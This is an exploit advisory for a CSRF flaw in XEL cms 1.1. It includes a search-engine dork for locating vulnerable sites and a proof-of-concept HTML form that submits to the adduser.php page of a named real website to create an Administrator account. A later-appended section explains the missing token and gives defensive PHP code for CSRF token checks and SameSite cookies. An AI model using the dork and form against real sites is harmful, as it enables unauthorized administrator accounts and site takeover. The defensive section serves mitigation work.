XEL cms© v. 1.1 CSRF Vulnerability

2021.11.16
indoushka (DZ)
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

====================================================================================================
| # Title     : XEL cms© v. 1.1 CSRF Vulnerability
| # Author    : indoushka
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit)
| # Vendor    : https://cyberxel.com
| # Dork      : "contact at: +91-98144 06799, z91-161-2408274 email: info@cyberxel.com"
====================================================================================================

poc :

[+] Dorking in Google or other search engine.

[+] save code as poc.html

<style>
@import 'http://cyberxel.com/xelcms/styles/main.css';
#form1 table { font-size: 12px; }
</style>
<link href="http://cyberxel.com/xelcms/fckeditor/_samples/sample.css" rel="stylesheet" type="text/css" />
<span class=td><img src="http://cyberxel.com/xelcms/dzimages/arrowpath.gif" />&nbsp;<a href="users.php" class=td>Users</a>
<img src="http://cyberxel.com/xelcms//dzimages/arrowpath2.gif" />&nbsp;Add user</h2>
</span><br><br>
<form id="form1" name="form1" method="post" action="http://www.sikhsinscotland.org/xelcms/user/adduser.php">
  <table width="99%" border="0" cellpadding="2" cellspacing="2">
    <tr>
      <td width="8%">Username:</td>
      <td width="92%"><label>
        <input name="username" type="text" id="username" style="font-size: 10px;width:300" />
      </label></td>
    </tr>
    <tr>
      <td>Password:</td>
      <td><label>
        <input name="password" type="password" id="password" style="font-size: 10px;width:300" />
      </label></td>
    </tr>
    <tr>
      <td>Confirm password:</td>
      <td><label>
        <input name="password2" type="password" id="password2" style="font-size: 10px;width:300" />
      </label></td>
    </tr>
    <tr>
      <td>Type:</td>
      <td><label>
        <select name="type" id="type" style="font-size: 10px;width:300">
          <option value="" selected></option>
          <option value="Administrator">Administrator</option>
          <option value="User">User</option>
        </select>
      </label></td>
    </tr>
    <tr>
      <td>&nbsp;</td>
      <td>
        <input type="submit" name="Submit" value="Create user" style="font-size: 10px;" />
      </td>
    </tr>
  </table>
</form>

[+] Admin Panel : /xelcms/

Greetings to :
====================================================================================================
| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*       |
====================================================================================================
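
The form in the PoC posts username, password, password2 and type to adduser.php and carries no per-session token, which is what lets a page on another origin submit it with the administrator's session. The following is an added example, not XEL cms code and not part of the original advisory: one way a handler of this kind can reject forged requests. The names csrf_token() and csrf_valid() and the csrf_token field are hypothetical, and it assumes PHP 7.3 or later with the admin panel served over HTTPS.

```php
<?php
// Added example: the XEL cms source is not on the page, so csrf_token(),
// csrf_valid() and the "csrf_token" field name are hypothetical.
declare(strict_types=1);

// SameSite=Strict keeps the browser from attaching the admin session cookie
// to a POST that originates from another site (such as a saved poc.html).
// 'secure' assumes HTTPS; the array form needs PHP 7.3 or later.
session_set_cookie_params(['samesite' => 'Strict', 'httponly' => true, 'secure' => true]);
session_start();

// Create the per-session token on first use and reuse it afterwards.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Compare the submitted token with the session copy in constant time.
function csrf_valid(array $post, array $session): bool
{
    $sent = $post['csrf_token'] ?? '';
    $want = $session['csrf_token'] ?? '';
    return is_string($sent) && is_string($want) && $want !== ''
        && hash_equals($want, $sent);
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    if (!csrf_valid($_POST, $_SESSION)) {
        http_response_code(403);
        exit('Request rejected: missing or invalid CSRF token.');
    }
    unset($_SESSION['csrf_token']); // single use: a fresh token is issued below
    // Assumption: the CMS's existing handling of username, password,
    // password2 and type continues from here, unchanged.
}
?>
<form id="form1" name="form1" method="post" action="adduser.php">
  <input type="hidden" name="csrf_token"
         value="<?= htmlspecialchars(csrf_token(), ENT_QUOTES) ?>" />
  <!-- the username, password, password2 and type fields from the page's form go here -->
  <input type="submit" name="Submit" value="Create user" />
</form>
```

A request built from a saved copy of the form has no way to read the session's token, so it fails csrf_valid() and receives a 403 before any user-creation code runs.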

